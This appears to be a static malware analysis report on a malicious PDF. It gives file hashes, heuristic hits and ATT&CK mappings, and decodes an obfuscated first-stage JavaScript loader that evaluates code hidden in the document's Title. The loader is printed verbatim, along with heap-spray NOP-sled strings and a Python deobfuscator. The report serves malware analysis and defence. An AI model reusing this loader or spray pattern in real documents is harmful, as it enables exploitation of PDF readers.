Malicious PDF — malware analysis report

Static analysis result for SHA-256 4feb5e89d6e05a9a…

Verdict: MALICIOUS
File type: PDF
Size: 6.8 KB
Created: 2009-07-13 19:22:54
Authoring application: sOY
First seen: 2026-05-08
MD5: 72c4335b0cb1d89f5056a800d32c8f6f
SHA-1: bd240f5e6c1646c749dda9b019c282e07dc960ad
SHA-256: 4feb5e89d6e05a9a129dc5bcc697465b196082f2af02ef026c89d9251843a9fa
Risk score: 146

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript (the report listed this as T1059.001, which is the PowerShell sub-technique)
  • T1204.002 User Execution: Malicious File

The PDF contains embedded JavaScript: the heuristics PDF_JAVASCRIPT, PDF_JS and PDF_UNESCAPE all fired. The script carried in object 7 is obfuscated, but not in a way that hides its logic from static reading. It defines two helpers, feerap(x), which returns new RegExp('['+x+']','g'), and raplit(s, re), which returns s.replace(re, ''); every API name is then built by deleting decoy characters from a seed string ('XdtoFc' minus the class [8ObFKXetP] gives 'doc', 'daYpFp' minus [tFYdk] gives 'app', 'TeLvjawl' minus [6hw1mLjNgT] gives 'eval', 'WtmiWt2lfe' minus [7WHEFLf2m] gives 'title'), and the remaining statements are dead counters and loops. The one call that does anything, i[u][z][l](a), resolves to this.app.doc.eval(this.title): the second stage is stored in the document's Title metadata string and evaluated from there, which is why the carved JavaScript stream shown below contains no unescape call or shellcode of its own. The reconstructed strings 'unescape('%25' + 'W9090W9090'.replace(/W/g, 'Au'.replace(/A/g, 'B' /B/g, unescape('%25'))))' and 'unescape('%25' + 'W0c0cW0c0c'.replace(/W/g, 'Au'.replace(/A/g, 'B' /B/g, unescape('%25'))))' (quoted as the analysis produced them) belong to that second stage: once W is rewritten to '%u' they become unescape('%u9090%u9090') and unescape('%u0c0c%u0c0c'), the NOP sled and 0x0c0c0c0c address pattern of a classic heap spray. Taken together, the JavaScript action, the eval of hidden content and the %u-escaped spray strings point to heap-spray exploitation of the PDF reader rather than a downloader; the analysis does not identify which reader vulnerability is targeted.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • JavaScript action (severity: low, 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    7 0 obj << /JS (paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegE …
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x173
Size: 1660 bytes
SHA-256: a0418946736df2f637d3e53bd77581e719cb6dde16d4e00b347e781843929b31
Preview script
First 1,000 lines of the extracted script
paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegExp('['+rapfem+']','g');dinwok=0;do{var femspa='feespa';dinwok++;}while(dinwok<8);}var spafee=0.0093;if(spafee>0){this.dinspa=0;while(dinspa<3){this.evespa=0.003;dinspa++;}}i=(this);this.paseve=0.013;wokfem=raplit('XdtoFc',feerap('8ObFKXetP'));var spalit=null;spalit+=0.0273;z=wokfem;function evepas(evewok,spafem,everip){for(var everap=0;everap<5;everap++){this.wokeve=0;while(wokeve<6){this.rapeve=5842;rapeve+=0.0096;wokeve++;}}return everip}femwok=raplit('daYpFp',feerap('tFYdk'));litspa=6062;litspa-=0.0092;u=femwok;this.ripeve=0;while(ripeve<4){for(var spadin=0;spadin<7;spadin++){for(var spaeve=0;spaeve<5;spaeve++){this.ripbal=0.0277;ripbal+=8256;}}ripeve++;}wokfee=raplit('TeLvjawl',feerap('6hw1mLjNgT'));unsdin=0.008;unsdin-=2196;l=wokfee;femrap=raplit('1a6pQp',feerap('6XHdQVt1I'));var unsbal=['spabal','feeuns'];u=femrap;for(this.unsfem=0;unsfem<4;unsfem++){balpas=0.01;balpas+=7146;}rapfee=raplit('WtmiWt2lfe',feerap('7WHEFLf2m'));balrap=0;ix=rapfee;var balrip=3988;balrip--;a=(this[ix]);var balspa=0;while(balspa<3){femuns=0.0061;femuns--;balspa++;}i[u][z][l](a);unsfee=0;while(unsfee<4){for(this.eveuns=0;eveuns<7;eveuns++){unslit=['lituns','unseve'];}unsfee++;}
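Resolving the decoy strings by hand is error-prone, so the following is a small static deobfuscator for the carved script and for the %u-escaped strings quoted in the Malware Insights section. It is an added example, not tooling from the analysis engine that produced this report. It emulates the two helpers the script defines (feerap builds a global RegExp character class, raplit deletes every matching character from a decoy string), follows the single-letter aliases, and rewrites the bracket-chained call with its real names; a second function expands unescape()-style %uXXXX escapes into the little-endian bytes they occupy in memory. The function names and regular expressions are mine, and the alias-following assumes, as is true for this sample, that the script's only real action is the final i[u][z][l](a) call; the script text is the one carved from object 7 above.

```python
import re

# Obfuscated JavaScript carved from object 7 of the sample, copied verbatim
# from the "Preview script" section of this report.
SAMPLE_JS = """paslit=0;while(paslit<7){var litrap={woklit:null};paslit++;}fempas='';litwok=2522;litwok--;feepas={pasfem:'litpas'};function raplit(feewok,pasfee){this.ripdin=2149;ripdin++;return feewok.replace(pasfee,fempas);this.wokdin=null;if(wokdin==3151){var rapdin=2368;rapdin+=1464;}}function ripfem(dinrap){this.dinrip=6429;dinrip-=7473;return dinrap}function feerip(riplit,ripfee,pasdin){this.dinpas='litrip';return ripfee}function feerap(rapfem){var femrip=null;femrip+=8351;return new RegExp('['+rapfem+']','g');dinwok=0;do{var femspa='feespa';dinwok++;}while(dinwok<8);}var spafee=0.0093;if(spafee>0){this.dinspa=0;while(dinspa<3){this.evespa=0.003;dinspa++;}}i=(this);this.paseve=0.013;wokfem=raplit('XdtoFc',feerap('8ObFKXetP'));var spalit=null;spalit+=0.0273;z=wokfem;function evepas(evewok,spafem,everip){for(var everap=0;everap<5;everap++){this.wokeve=0;while(wokeve<6){this.rapeve=5842;rapeve+=0.0096;wokeve++;}}return everip}femwok=raplit('daYpFp',feerap('tFYdk'));litspa=6062;litspa-=0.0092;u=femwok;this.ripeve=0;while(ripeve<4){for(var spadin=0;spadin<7;spadin++){for(var spaeve=0;spaeve<5;spaeve++){this.ripbal=0.0277;ripbal+=8256;}}ripeve++;}wokfee=raplit('TeLvjawl',feerap('6hw1mLjNgT'));unsdin=0.008;unsdin-=2196;l=wokfee;femrap=raplit('1a6pQp',feerap('6XHdQVt1I'));var unsbal=['spabal','feeuns'];u=femrap;for(this.unsfem=0;unsfem<4;unsfem++){balpas=0.01;balpas+=7146;}rapfee=raplit('WtmiWt2lfe',feerap('7WHEFLf2m'));balrap=0;ix=rapfee;var balrip=3988;balrip--;a=(this[ix]);var balspa=0;while(balspa<3){femuns=0.0061;femuns--;balspa++;}i[u][z][l](a);unsfee=0;while(unsfee<4){for(this.eveuns=0;eveuns<7;eveuns++){unslit=['lituns','unseve'];}unsfee++;}"""

# name=raplit('decoy',feerap('chars'));  -> decoy with every char in [chars] removed
BUILD_RE = re.compile(r"(\w+)=raplit\('([^']*)',feerap\('([^']*)'\)\);")
# z=wokfem;  short alias of an already-built string
ALIAS_RE = re.compile(r"(?<![\w.])(\w+)=(\w+);")
# i=(this);  and  a=(this[ix]);  reads on the Acrobat Doc object
THIS_RE = re.compile(r"(\w+)=\(this\);")
PROP_RE = re.compile(r"(\w+)=\(this\[(\w+)\]\);")
# i[u][z][l](a);  the bracket-chained call that is the script's only real action
SINK_RE = re.compile(r"(\w+)\[(\w+)\]\[(\w+)\]\[(\w+)\]\((\w+)\);")


def strip_chars(decoy, charset):
    """Emulate decoy.replace(new RegExp('[' + charset + ']', 'g'), '')."""
    return "".join(c for c in decoy if c not in charset)


def resolve_strings(js):
    """Map every raplit()/feerap() result variable to the string it builds."""
    return {name: strip_chars(decoy, cls) for name, decoy, cls in BUILD_RE.findall(js)}


def resolve_sink(js):
    """Rewrite the bracket-chained call with decoded names, or None if absent."""
    names = resolve_strings(js)
    for var, rhs in ALIAS_RE.findall(js):
        if rhs in names:            # later assignments win, as in the script
            names[var] = names[rhs]
    for var in THIS_RE.findall(js):
        names[var] = "this"
    for var, idx in PROP_RE.findall(js):
        names[var] = "this." + names.get(idx, idx)
    m = SINK_RE.search(js)
    if not m:
        return None
    obj, p1, p2, method, arg = (names.get(t, t) for t in m.groups())
    return f"{obj}.{p1}.{p2}.{method}({arg})"


def unescape_u(text):
    """Expand JavaScript unescape() escapes (%uXXXX, %XX) to the little-endian
    bytes the resulting string occupies in memory as UTF-16 code units / raw bytes."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})|(.)", text, re.S):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out.append(int(m.group(2), 16))
        else:
            out += m.group(3).encode("latin-1")
    return bytes(out)


if __name__ == "__main__":
    print(resolve_strings(SAMPLE_JS))
    print("sink:", resolve_sink(SAMPLE_JS))
    # The two reconstructed strings from the Malware Insights section, after W -> '%u'
    for decoy in ("W9090W9090", "W0c0cW0c0c"):
        print(decoy, "->", unescape_u(decoy.replace("W", "%u")).hex())
```

Running it prints the five decoded names (doc, app, eval, app, title), the resolved sink this.app.doc.eval(this.title), and the bytes 90909090 and 0c0c0c0c for the two spray strings. The decoy-stripping emulation is exact for this family because it mirrors the helpers the script itself defines; the alias following is deliberately simple, and a sample that chains aliases through function calls or builds names with a different primitive should instead be run in a JavaScript engine with hooked app and Doc objects that log what reaches eval.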